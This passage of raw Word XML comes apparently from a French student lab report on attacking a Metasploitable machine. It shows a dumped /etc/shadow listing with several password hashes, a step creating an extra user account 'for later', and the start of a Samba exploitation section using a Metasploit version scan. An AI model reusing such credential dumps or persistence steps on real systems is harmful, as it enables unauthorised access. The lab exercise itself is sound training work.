        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B966D2A" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04E6DC72" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bind:*:14685:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27A3C261" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>postfix:*:14685:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5064C938" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ftp:*:14685:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45885C35" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B46488E" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:!:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A2741" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>tomcat55:*:14691:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07A0E73F" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14698:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42D40E50" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C35F644" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D357B6D" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>telnetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14715:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27CCCD94" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00C86E87" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>proftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:!:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>14727:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F77D74" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>statd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:15474:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F1A70D0" w14:textId="2FADB35E" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="002E515D">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BB229A" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6043772E" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199B5F12" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F46839" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD4CC66" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0A889D" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0946F177" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEC9A01" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58273811" w14:textId="77777777" w:rsidR="001144B0" w:rsidRDefault="001144B0" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145178C8" w14:textId="77777777" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E3FDF3" w14:textId="77777777" w:rsidR="0050154C" w:rsidRPr="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B886A65" w14:textId="6024D89A" w:rsidR="002E515D" w:rsidRDefault="0050154C" w:rsidP="002E515D">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc197957014"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Création d’</w:t>
      </w:r>
      <w:r w:rsidR="002E515D">
        <w:t>un nouvel utilisateur pour plus tard :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="002E515D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A07256D" w14:textId="2474E99F" w:rsidR="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>On utilise la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1FB42" w14:textId="6750AEC1" w:rsidR="0050154C" w:rsidRPr="0050154C" w:rsidRDefault="0050154C" w:rsidP="0050154C">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>newuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29687BE0" w14:textId="77777777" w:rsidR="002E515D" w:rsidRDefault="002E515D" w:rsidP="002E515D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002E515D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25513383" wp14:editId="6DD09581">
            <wp:extent cx="4902200" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12306129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12984" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4902200" cy="1435100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E3CC5B" w14:textId="566C7E43" w:rsidR="002F1BC6" w:rsidRPr="00862130" w:rsidRDefault="002E515D" w:rsidP="00862130">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t> : création du nouvel utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB558B" w14:textId="5ADB1A1C" w:rsidR="002F1BC6" w:rsidRDefault="002F1BC6" w:rsidP="00862130">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc197957015"/>
      <w:r>
        <w:t>2. Exploitation d’un service Samba :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="220B3B74" w14:textId="485428CA" w:rsidR="002F1BC6" w:rsidRPr="002F1BC6" w:rsidRDefault="002F1BC6" w:rsidP="002F1BC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1BC6">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Réalisez un scan qui vous permettra d'obtenir la version de Samba (module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1BC6">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1BC6">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> des outils auxiliaire de Metasploit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0350A" w14:textId="77777777" w:rsidR="0016016C" w:rsidRDefault="0016016C" w:rsidP="0016016C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0016016C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2EB7C0" wp14:editId="45971C5F">
            <wp:extent cx="5604856" cy="3304097"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2120930346" name="Image 1"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30346" name="Image 1" descr="Une image contenant texte, capture d’écran, Logiciel multimédia&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5607082" cy="3305409"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F37A09F" w14:textId="4F2C939F" w:rsidR="002F1BC6" w:rsidRDefault="0016016C" w:rsidP="0016016C">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : scan qui permettra d'obtenir la version de samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C71F3" w14:textId="77777777" w:rsidR="0016016C" w:rsidRDefault="0016016C" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B240331" w14:textId="085ED182" w:rsidR="0016016C" w:rsidRPr="000E35DF" w:rsidRDefault="000E35DF" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E35DF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
